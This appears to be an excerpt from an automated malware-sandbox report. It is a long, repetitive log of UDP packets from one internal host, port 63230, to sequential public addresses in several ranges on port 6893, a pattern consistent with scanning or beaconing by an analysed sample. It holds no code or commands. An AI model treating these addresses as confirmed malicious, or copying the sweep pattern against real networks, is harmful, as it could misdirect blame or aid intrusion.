          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.14:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.15:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.16:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.17:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.18:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.19:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.20:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.21:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.22:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.23:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.24:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.25:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.26:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.27:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.28:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.29:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.30:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 93.107.12.31:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.0:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.1:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.2:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.3:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.4:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.5:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.6:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.7:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.8:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.9:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.10:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.11:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.12:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.13:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.14:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.15:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.16:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.17:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.18:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.19:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.20:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.21:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.22:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.23:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.24:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.25:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.26:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.27:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.28:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.29:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.30:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 95.1.200.31:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.0:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.1:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.2:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.3:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.4:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.5:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.6:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.7:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.8:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.9:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.10:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.11:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.12:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.13:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.14:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.15:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.16:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.17:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.18:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.19:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.20:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.21:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.22:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.23:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.24:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.25:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.26:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.27:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.28:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.29:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.30:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.31:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.32:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.33:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.34:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.35:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.36:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.37:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.38:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.39:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.40:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.41:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.42:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.43:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.44:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.45:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.46:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.47:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.48:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.49:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.50:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.51:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.52:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.53:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.54:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.55:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.56:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.57:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.58:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.59:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.60:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.61:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.62:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.63:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.64:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.65:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.66:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.67:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.68:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.69:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.70:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.71:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.72:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.73:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.74:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.75:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.76:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.77:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.78:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.79:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.80:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.81:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.82:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.83:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.84:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.85:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.86:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.87:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.88:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.89:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.90:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.91:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.92:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.93:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.94:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.95:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.96:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.97:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.98:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.99:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.100:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.101:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.102:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.103:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.104:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.105:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.106:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.107:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.108:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.109:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.110:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.111:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.112:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.113:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.114:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.115:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.116:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.117:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.118:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.119:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.120:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.121:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.122:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.123:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.124:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.125:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.126:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.127:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.128:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.129:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.130:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.131:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.132:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.133:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.134:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.135:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.136:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.137:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.138:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.139:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.140:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.141:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.142:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.143:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.144:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.145:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.146:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.147:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.148:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.149:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.150:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.151:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.152:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.153:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.154:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.155:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.156:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.157:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.158:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.159:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.160:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.161:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.162:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.163:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.164:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.165:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.166:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.167:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.168:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.169:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.170:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.171:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.172:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.173:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.174:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.175:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.176:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.177:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.178:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.179:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.180:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.181:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.182:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.183:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.184:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.185:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.186:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.187:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.188:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.189:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.190:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.191:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.192:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.193:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.194:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.195:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.196:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.197:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.198:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.199:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.200:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.201:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.202:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.203:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.204:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.205:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.206:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.207:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.208:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.209:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.210:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.211:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.212:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.213:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.214:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.215:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.216:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.217:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.218:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.219:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.220:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.221:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.222:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.223:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.224:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.225:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.226:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.227:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.228:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.229:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.230:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.231:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.232:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.233:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.234:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.235:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.236:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.237:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.238:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.239:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.240:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.241:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.242:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.243:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.244:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.245:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.246:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.247:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.248:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.249:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.250:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.251:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.252:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.253:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.254:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.176.255:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.0:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.1:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.2:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.3:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.4:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.5:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.6:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.7:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.8:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.9:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.10:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.11:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.12:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.13:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.14:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.15:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.16:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.17:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.18:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.19:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.20:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.21:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.22:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.23:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.24:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.25:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.26:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.27:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.28:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.29:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.30:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.31:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.32:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.33:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.34:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.35:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.36:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.37:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.38:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.39:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.40:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.41:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.42:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.43:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.44:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.45:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.46:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.47:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.48:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.49:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.50:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.51:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.52:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.53:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.54:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.55:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.56:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.57:6893
          Source: global trafficUDP traffic: 192.168.2.6:63230 -> 87.98.177.58:6893
